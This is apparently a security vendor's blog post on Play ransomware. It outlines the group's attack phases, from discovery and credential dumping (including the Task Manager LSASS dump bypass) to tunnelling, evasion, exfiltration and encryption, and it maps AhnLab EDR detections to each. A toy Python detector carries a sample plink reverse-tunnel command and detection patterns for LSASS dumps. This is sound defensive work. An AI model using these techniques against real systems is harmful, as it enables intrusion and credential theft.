Play Ransomware Attack Cases Detected by AhnLab EDR
Play ransomware, also known as Balloonfly or PlayCrypt, was first identified in June 2022 and has reportedly attacked over 300 organizations worldwide since then. A notable characteristic of the ransomware, which remains in active use, is that it appends the “.PLAY” extension to files after encrypting them. Like other ransomware threat actors, the group steals information before encrypting systems, uses it to threaten victims, and publishes a list of attacked companies on its website.

Figure 1. Disclosed company information
According to a report by Unit42 of Palo Alto Networks, a collaboration between Play ransomware and the Andariel group has been confirmed. In this case, the Andariel group utilized malware known as Sliver and DTrack to steal information, and then a Play ransomware attack was carried out using the same attack infrastructure. For reference, the Andariel group has also used SHATTEREDGLASS and Maui ransomware in past attacks. [1] [2]
The initial access methods are known to involve abusing valid accounts or attacking vulnerabilities in exposed services. Notable examples include the ProxyNotShell vulnerabilities (CVE-2022-41040, CVE-2022-41082) in the MS Exchange Server and the CVE-2020-12812, CVE-2018-13379 vulnerabilities in FortiOS.
This section will introduce the known attack methods of the Play ransomware threat actors, as well as the methods AhnLab EDR uses to detect the attack techniques observed during the process of taking control of an organization after initial access. [3] [4] [5]
AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution that provides threat monitoring, analysis, and response capabilities for endpoints based on AhnLab’s proprietary behavior-based engine. AhnLab EDR continuously collects information on suspicious behaviors by behavior type, allowing users to recognize threats precisely from a detection, analysis, and response perspective. Users can then analyze the collected data to identify root causes, respond with appropriate measures, and establish processes to prevent recurrence.

Figure 2. AhnLab EDR
1. Discovery
Threat actors can gather information on active systems and port numbers, which represent running services, in a target domain through port scanning. Through this network exploration process, they identify the network’s structure, such as subnet and host information. Play ransomware threat actors are known to use the NetScan tool during the process of collecting network information.
They then collect Active Directory information on the current network, such as domain controllers and domain trust relationships. The built-in Windows tool Nltest can be used for this, and AdFind, the most commonly seen tool, may also be installed. The threat actors can use the results from AdFind to learn the structure of the domain environment and identify attack targets for lateral movement.
Finally, BloodHound is also known to be used. BloodHound collects Active Directory domain information and helps identify attack paths for privilege escalation. It presents the collected data as a graph in a GUI, visualizing the shortest path by which threat actors can obtain domain administrator privileges.

Figure 3. EDR detection of threat actor attack actions used in the Discovery phase
2. Privilege Escalation
During the privilege escalation phase, threat actors are known to use Windows Privilege Escalation Awesome Scripts (WinPEAS), an open-source tool publicly available on GitHub. WinPEAS collects various information such as system configurations, user accounts, and file permissions, and detects vulnerabilities and misconfigurations that can be exploited for privilege escalation. Threat actors can use the results to gain administrator privileges.

Figure 4. EDR detection of WinPEAS used in the Privilege Escalation phase
3. Credential Access
In environments where the organization’s infrastructure uses Active Directory, threat actors can collect domain environment information through the Discovery process, steal credential information, and then use it to move laterally, ultimately taking control of the domain environment.
Threat actors are known to use Mimikatz or abuse the Task Manager (taskmgr.exe) for this purpose. Mimikatz is a program with features to extract account credentials in a Windows OS environment. As an open-source project publicly available on GitHub, it is favored by threat actors. Among its supported features is the ability to extract NT Hashes (a hash used in the NTLM authentication protocol) stored in the memory of the LSASS process.
However, such memory dump actions are considered suspicious by security products, and tools like Mimikatz are key detection targets for them. One method of bypassing this is to abuse the Task Manager: besides viewing and controlling the list of currently running processes, it can also create memory dumps of running processes. An LSASS process dump generated through the Task Manager can later be analyzed with other tools to extract the credentials it contains.

Figure 5. EDR detection of threat actor attack actions used in the Credential Access phase
4. Command and Control
In the stage of controlling infected systems, Cobalt Strike and Empire are known to be primarily used. These types of malware can be detected and blocked by V3 products. However, the Play ransomware threat actors also use AnyDesk to control infected systems.
Remote management tools like AnyDesk are often used for legitimate remote control and management purposes, which makes it challenging for anti-malware products to simply detect and block them. Threat actors exploit this limitation, and in addition to AnyDesk, tools such as GotoHTTP, RustDesk, and Atera are also exploited. Even when users use remote administration tools for normal remote control purposes, AhnLab EDR collects and provides related data to allow administrators to recognize and respond to suspicious behaviors.
While threat actors may communicate directly with the C&C server, they may also install proxy tools. These tools are mainly used to expose infected systems that sit inside a private network, such as a NAT environment, and are therefore not normally reachable from outside. Play ransomware threat actors are also known to have used Plink in their attacks. Plink is a Secure Shell (SSH) client that is part of the PuTTY toolset. It is a command-line tool used to establish SSH connections to remote servers or to perform port forwarding.

Figure 6. EDR detection of threat actor attack actions used in the Command and Control phase
5. Lateral Movement
Threat actors can leverage credential information collected during the Credential Access phase to move laterally and take control of an organization’s internal network. Cobalt Strike provides not only control over infected systems but also various functions, including information gathering, credential theft, and lateral movement. Play ransomware threat actors are also known to have utilized Cobalt Strike’s SMB beacon during the lateral movement process.
In many breach incidents, not only Cobalt Strike but also a tool called PsExec is commonly abused during lateral movement. PsExec is one of Microsoft’s Sysinternals tools and allows commands to be executed on remote systems. When threat actors possess credentials gathered during the Credential Access phase, PsExec can be abused to execute malicious commands or payloads on other systems within the network.

Figure 7. EDR detection of threat actor attack actions used in the Lateral Movement phase [6]
6. Defense Evasion
Generally, organizations such as institutes and companies use various security products to prevent security threats. Since most users nowadays have security products installed on their PCs, threat actors often attempt to disable them after initial access, using a variety of tools. The problem is that many of the tools used in the process are not malware strains, but programs that can also be used for legitimate purposes.
For example, threat actors often use tools like Process Hacker to disable security products. Since these tools are frequently used for legitimate purposes, it can be challenging for anti-malware solutions to detect and block them. In fact, Play ransomware threat actors are known to abuse tools like Process Hacker, GMER, and IObit Uninstaller during the Defense Evasion phase.
Process Hacker is a tool that displays a list of currently running processes and provides various functions such as querying related information and controlling processes. GMER is an anti-rootkit tool that detects hidden processes, services, files, registry entries, and drivers. IObit Uninstaller, as its name suggests, is a tool that allows users to view the programs installed on a computer and uninstall selected ones. These tools are commonly seen in intrusion incidents, and AhnLab EDR detects them as threats when they are used in attacks, enabling administrators to identify them in advance.

Figure 8. EDR detection of threat actor attack actions used in the Defense Evasion phase
7. Collection/Exfiltration
Like other ransomware threat actors, Play ransomware threat actors not only encrypt an organization’s systems but also steal information beforehand to use for extortion. Threat actors collect sensitive information from compromised systems, compress it, and then exfiltrate it.
Although many tools exist for compressing files and folders, Play ransomware threat actors are primarily known to use WinRAR. The compressed files are then exfiltrated using WinSCP.

Figure 9. EDR detection of threat actor attack actions used in the Collection/Exfiltration phase
8. Impact
Play ransomware encrypts users’ files and appends the “.PLAY” extension to them, before generating a ransom note named “ReadMe.txt.” The ransom note includes the threat actor’s email address and a Tor link to the Play ransomware page, which contains information about the affected organization.
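The following toy detector illustrates how the behaviours described in the Credential Access, Command and Control, and Impact sections (an LSASS dump written by Task Manager, Plink started with a port-forwarding switch, and the “.PLAY” rename burst with the “ReadMe.txt” ransom note) can be flagged from endpoint telemetry. It is an added example, not AhnLab EDR logic or code from the threat actors; the Sysmon-like event dicts and host names are constructed for the illustration, and the threshold of 20 renames is an assumed tuning value.

```python
"""Toy detection logic for three Play ransomware behaviours described in this
post, mapped to the ATT&CK techniques in the table below.  Added example, not
AhnLab EDR code; the event shape is a simplified Sysmon-like dict and all
sample telemetry is constructed (assumption)."""
import re
from collections import defaultdict

# Constructed sample telemetry: id 1 = process create, id 11 = file create.
EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\Taskmgr.exe", "cmdline": "Taskmgr.exe"},
    {"id": 11, "host": "WS01", "image": r"C:\Windows\System32\Taskmgr.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\lsass.DMP"},
    {"id": 1, "host": "WS01", "image": r"C:\ProgramData\plink.exe",
     "cmdline": "plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.5"},
    {"id": 11, "host": "WS01", "image": r"C:\Program Files\WinRAR\WinRAR.exe", "target": r"C:\Temp\docs.rar"},
] + [
    {"id": 11, "host": "FS01", "image": r"C:\Users\user\enc.exe", "target": rf"D:\share\file{i}.docx.PLAY"}
    for i in range(25)
] + [{"id": 11, "host": "FS01", "image": r"C:\Users\user\enc.exe", "target": r"D:\share\ReadMe.txt"}]

LSASS_DUMP = re.compile(r"\\lsass[^\\]*\.dmp$", re.I)      # Task Manager names the dump lsass.DMP
PLINK_FWD = re.compile(r"\bplink(\.exe)?\b.*\s-(R|L|D)\s", re.I)  # plink forwarding switches

def detect_lsass_dump(events):
    """T1003.001: any process writing an lsass*.dmp file.  Task Manager is a
    legitimate binary, so the dump artifact, not the tool, is what to alert on."""
    return [(e["host"], e["image"].rsplit("\\", 1)[-1]) for e in events
            if e["id"] == 11 and LSASS_DUMP.search(e["target"])]

def detect_plink_tunnel(events):
    """T1572: plink started with a local (-L), remote (-R) or dynamic (-D) forward."""
    return [(e["host"], e["cmdline"]) for e in events
            if e["id"] == 1 and PLINK_FWD.search(e.get("cmdline", ""))]

def detect_play_encryption(events, threshold=20):
    """T1486: per host, count ".PLAY" file creations and note the ransom note.
    Alert when the rename burst passes the threshold, or when ReadMe.txt is
    dropped on a host that also produced at least one ".PLAY" file."""
    play, note = defaultdict(int), set()
    for e in events:
        if e["id"] != 11:
            continue
        name = e["target"].rsplit("\\", 1)[-1].lower()
        if name.endswith(".play"):
            play[e["host"]] += 1
        elif name == "readme.txt":
            note.add(e["host"])
    return {h for h, n in play.items() if n >= threshold} | (note & set(play))

if __name__ == "__main__":
    print(detect_lsass_dump(EVENTS))       # [('WS01', 'Taskmgr.exe')]
    print(detect_plink_tunnel(EVENTS))
    print(detect_play_encryption(EVENTS))  # {'FS01'}
```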

Figure 10. EDR detection of Play ransomware
9. Conclusion
Play ransomware threat actors remain active to this day and are even suspected of collaborating with the Andariel group, which is reportedly supported by North Korea. The threat actors gain initial access to organizations by exploiting vulnerabilities or abusing compromised accounts, gradually taking control of the internal network, collecting sensitive information, and ultimately encrypting the systems they have compromised.
AhnLab EDR detects threats at each stage of the known attack methods of Play ransomware threat actors, helping administrators identify the cause, respond appropriately, and establish recurrence-prevention processes. Additionally, it collects and highlights information about suspicious tools being installed or executed within the organization as key activities, enabling administrators to identify and respond to suspicious behavior effectively.
Behavior Detection
– LateralMovement/EDR.ADFind.M10710
– Infostealer/DETECT.Nltest.M10657
– Execution/EDR.Behavior.M10482
– Escalation/EDR.WinPEAS.M12246
– Execution/EDR.SharpHound.M11547
– CredentialAccess/EDR.Event.M11566
– CredentialAccess/EDR.Mimikatz.M12363
– Execution/DETECT.AnyDesk.M11495
– Execution/DETECT.Plink.M12255
– LateralMovement/EDR.PSExec.M10481
– DefenseEvasion/EDR.GMER.M11645
– DefenseEvasion/DETECT.IObit.M12365
– Execution/DETECT.ProcHacker.M11647
– Infostealer/DETECT.WinRAR.M12364
– Execution/DETECT.WinSCP.M11619
– Ransom/EDR.Decoy.M2470
MITRE ATT&CK Mapping Information
| Tactic | Technique |
|---|---|
| Discovery (TA0007) | Remote System Discovery (T1018); System Owner/User Discovery (T1033); Network Service Discovery (T1046); Permission Groups Discovery: Local Groups (T1069.001); Permission Groups Discovery: Domain Groups (T1069.002); Account Discovery: Local Account (T1087.002); Account Discovery: Domain Account (T1087.002); Domain Trust Discovery (T1482); Group Policy Discovery (T1615) |
| Credential Access (TA0006) | OS Credential Dumping: LSASS Memory (T1003.001) |
| Command and Control (TA0011) | Remote Access Software (T1219); Protocol Tunneling (T1572) |
| Lateral Movement (TA0008) | Lateral Tool Transfer (T1570) |
| Defense Evasion (TA0005) | Impair Defenses: Disable or Modify Tools (T1562.001) |
| Collection (TA0009) | Archive Collected Data: Archive via Utility (T1560.001) |
| Exfiltration (TA0010) | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003) |
| Impact (TA0040) | Financial Theft (T1657); Data Encrypted for Impact (T1486) |